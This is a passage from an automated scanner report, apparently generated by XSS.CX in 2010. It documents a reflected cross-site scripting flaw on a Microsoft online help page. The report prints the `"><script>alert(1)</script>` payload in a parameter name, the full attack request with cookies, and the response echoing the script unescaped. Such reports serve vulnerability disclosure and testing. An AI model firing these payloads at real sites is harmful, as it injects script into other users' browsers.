<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/zh-hk/bing/ff808535.aspx?20c4e"><script>alert(1)</script>d224097e515=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

1.65. http://onlinehelp.microsoft.com/zh-TW/bing/ff808535(zh-TW).aspx [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /zh-TW/bing/ff808535(zh-TW).aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a7dc"><script>alert(1)</script>3e749dd5ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /zh-TW/bing/ff808535(zh-TW).aspx?4a7dc"><script>alert(1)</script>3e749dd5ba5=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: A=I&I=AxUFAAAAAABWCQAAhHGE8cBJXxVlyuiw2wFHBg!!&M=1; ixpLightBrowser=0; ADS=SN=175A21EF;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 15:06:25 GMT
Content-Length: 37315


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Table%20of%20Contents&body=http://onlinehelp.microsoft.com/zh-tw/bing/ff808535.aspx?4a7dc"><script>alert(1)</script>3e749dd5ba5=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

Report generated by XSS.CX at Sun Nov 14 12:12:18 CST 2010.